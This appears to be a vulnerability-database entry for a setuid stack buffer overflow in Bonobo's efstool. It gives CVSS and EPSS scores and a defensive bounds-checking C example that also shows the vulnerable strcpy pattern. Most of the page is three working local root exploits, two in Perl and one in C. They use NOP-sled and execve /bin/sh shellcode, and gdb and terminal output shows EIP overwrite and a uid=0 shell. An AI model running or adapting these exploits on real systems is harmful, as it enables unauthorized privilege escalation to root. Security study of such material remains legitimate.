CPE, which stands for Common Platform Enumeration, is a standardized naming scheme for hardware, software and operating systems. CPE provides a structured naming scheme for uniquely identifying and classifying computer systems, platforms and software packages on the basis of attributes such as vendor, product name, version, update, edition and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses at the architecture, design, code or implementation level that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents the common attack patterns used by adversaries in cyberattacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Buffer overflow in efstools in Bonobo, when installed setuid, allows local users to execute arbitrary code via long command line arguments.
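The flaw class in the description above, as an added example that is not Bonobo's efstool source: a constructed unbounded copy of a command-line argument into a fixed stack buffer beside a bounds-checked replacement that rejects over-long input, plus a stat()-based check for the "installed setuid" precondition the CVE names. ARG_BUF, copy_arg_unchecked, copy_arg_checked and is_setuid are hypothetical names.

```c
/* Added example (not Bonobo's efstool source): a constructed stand-in for the
 * flaw class the CVE describes, copying a command-line argument into a fixed
 * stack buffer, beside a bounds-checked replacement and a setuid check. */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#define ARG_BUF 256 /* hypothetical fixed-size stack buffer */

/* Vulnerable pattern (CWE-120 style): no length check, so an argument longer
 * than the buffer overwrites what follows it on the stack, return address
 * included. Shown for contrast only; never feed it untrusted input. */
void copy_arg_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: refuse over-long input instead of truncating silently.
 * Returns 0 on success, -1 if arg plus its NUL does not fit in dst_size. */
int copy_arg_checked(char *dst, size_t dst_size, const char *arg)
{
    size_t n = 0;
    while (n < dst_size && arg[n] != '\0') /* bounded scan, no strnlen needed */
        n++;
    if (n == dst_size) /* no terminator within dst_size: reject */
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Mitigation check for the "when installed setuid" precondition:
 * 1 if path carries the setuid bit, 0 if not, -1 if stat() fails. */
int is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

int main(int argc, char **argv)
{
    char buf[ARG_BUF];
    const char *arg = argc > 1 ? argv[1] : "";
    if (copy_arg_checked(buf, sizeof buf, arg) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", ARG_BUF - 1);
        return 1;
    }
    printf("accepted %zu bytes; setuid check: %d\n", strlen(buf),
           is_setuid(argc > 2 ? argv[2] : "/usr/bin/efstool"));
    return 0;
}
```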
CVE Information
Metrics

Metrics | Score | Severity | CVSS Vector                | Source
V2      | 4.6   |          | AV:L/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date       | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17)
2022-02-06 | –       | –       | 1.9%                   | –                      | –
2022-04-03 | –       | –       | 1.9%                   | –                      | –
2022-04-24 | –       | –       | 1.9%                   | –                      | –
2022-09-11 | –       | –       | 1.9%                   | –                      | –
2023-03-12 | –       | –       | –                      | 0.04%                  | –
2024-02-11 | –       | –       | –                      | 0.15%                  | –
2024-03-03 | –       | –       | –                      | 0.15%                  | –
2024-06-02 | –       | –       | –                      | 0.15%                  | –
2024-09-22 | –       | –       | –                      | 0.04%                  | –
2024-12-22 | –       | –       | –                      | 0.39%                  | –
2025-01-19 | –       | –       | –                      | 0.39%                  | –
2025-03-18 | –       | –       | –                      | –                      | 0.14%
2025-03-30 | –       | –       | –                      | –                      | 0.12%
2025-04-06 | –       | –       | –                      | –                      | 0.12%
2025-04-15 | –       | –       | –                      | –                      | 0.12%
EPSS Percentile
The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare a CVE's EPSS score against those of other CVEs.
Publication date: 2002-06-28 22:00 +00:00 Author: clorox EDB Verified: Yes
source: https://www.securityfocus.com/bid/5125/info
Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems.
A boundary condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long command-line argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker-supplied code.
#!/usr/bin/perl
# efstool root exploit
# written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp)
# give the campers internet grogan!
#
# tested to work on slackware 8, mandrake 8, mandrake 7.1
# tweaks may be needed on the offset
# method 1 works more often but
# method 2 is faster but not too good
#
#
# enjoy -clorox
# perl efs.pl -1000
$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";
$shellcode2 =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";
$ret = "0xbfffe890";
$offset = $ARGV[0];
$nop = "\x90";
if ($ARGV[1] eq "m1") {
$len = 3000;
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
} elsif ($ARGV[1] eq "m2") {
$len = 10010;
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode2;
} else {
print "You must specify a method fool!\n";
print "perl $0 <offset> m1 or m2\n";
}
$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));
exec("efstool $buffer");
# and on the seventh day clorox said "LET THERE BE SHELL!"
Publication date: 2002-06-28 22:00 +00:00 Author: andrea lisci EDB Verified: Yes
source: https://www.securityfocus.com/bid/5125/info
#!/usr/bin/perl
# efstool root exploit
# written by andrea lisci
# perl efstool.pl 3000
$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";
$ret = "0xbfffe984";
$offset = $ARGV[0];
$nop = "\x90";
$buffer="'";
$len = 2652;
for ($i = 0; $i < $len; $i++) {
$buffer .= $nop;
}
$buffer .= pack('l', ($ret + $offset));
for ($i = 0; $i < 10000; $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
$buffer .="'";
exec("efstool $buffer");
Publication date: 2002-06-28 22:00 +00:00 Author: N4rK07IX EDB Verified: Yes
// source: https://www.securityfocus.com/bid/5125/info
/*
Author: N4rK07IX
narkotix@linuxmail.org || kayaem@itu.edu.tr (i think this is a useless pop3 box, never checked, inbox is out of memory)
**Vulnerability: The vulnerability is OLD and out of date. Mandrake Linux 9.0 "efstool" libefs1-1.0.20-4mdk local stack overflow.
[narkotix@labs c-hell]$ efstool `perl -e 'print "A"x2688'`
Segmentation fault
[narkotix@labs c-hell]$
(gdb) r `perl -e 'print "A"x2688'`
Starting program: /usr/bin/efstool `perl -e 'print "A"x2688'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax    0xa         10
ecx    0xa         10
edx    0x4f4c4554  1330398548
ebx    0x41414141  1094795585
esp    0xbfffe780  0xbfffe780
ebp    0x41414141  0x41414141
esi    0x41414141  1094795585
edi    0x41414141  1094795585
eip    0x41414141  0x41414141
eflags 0x210286    2163334
cs     0x23        35
ss     0x2b        43
ds     0x2b        43
es     0x2b        43
fs     0x0         0
[narkotix@labs c-hell]$ ./env <----- This puts sh3llc0de with 0x90 padding into the environment
[narkotix@labs c-hell]$ efstool `perl -e 'print "\x1c\xfd\xff\xbf" x 672'`
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(narkotix)
sh-2.05b#
Exploited on Mandrake Linux 9.0 in 2003 <--- old history :p
efstool must be suid to get an uid(0), but i saw on many systemz it is not suided, on my system it is.
Maybe when i was asleep my mom had gone and suided it :P
[narkotix@labs c-hell]$ make efs_n4
cc efs_n4.c -o efs_n4
[narkotix@labs c-hell]$ ./efs_n4
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(narkotix)
sh-2.05b#
Scriptkiddi3Z i'm sorry, this is not an 0Hday;
Efstool bug is out of fashion. I've forgotten to release this shit a year ago,
but today i found it in my toolz directory. N0w it is fr33...
Greetz: EFnet, laplace_ex, math_monkey, deathmann, ISLAM Nation, EnderUNIX team (Turk BSD crew)
Shoutz: Hi bigmutant, is da default config register 0x2102 on your cisco1700 ??
Last Words: laplace_ex, I need to drop one course; I'll be waiting in the hydraulics laboratory on Friday.
Your Motorola 68000 book is still with me too, I'll bring it along ---> Duel next week :P
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define BUFFERSIZE 2688
static char hell_code[] = // 52 bytes sh3llc0de
/* setreuid(0,0); */
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
/* setgid(0); */
"\x31\xdb" // xor %ebx,%ebx
"\x89\xd8" // mov %ebx,%eax
"\xb0\x2e" // mov $0x2e,%al
"\xcd\x80" // int $0x80
/* execve /bin/sh */
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
/* exit(); */
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
int main(void) // Th3 l3ss c0d3,th3 b3st performance..
{
    printf("Mandrake Linux 9.0 efstool local xploit written by N4rK07IX\n");
    printf("=> narkotix@linuxmail.org\n");
    char *env[2] = {hell_code, NULL};
    char buffer[BUFFERSIZE + 1]; /* one extra byte so the argument is a NUL-terminated string */
    int i;
    int *lamepointer = (int *)(buffer);
    int ret_addr = 0xbffffffa - strlen(hell_code) - strlen("/usr/bin/efstool");
    for (i = 0; i < BUFFERSIZE - 1; i += 4)
        *lamepointer++ = ret_addr;
    buffer[BUFFERSIZE] = '\0';
    /* execle() only returns on failure; the original "if(!execle)" tested the
       function's address and could never fire, so check the return value instead */
    if (execle("/usr/bin/efstool", "efstool", buffer, NULL, env) == -1)
        perror("execle()");
    return 0;
}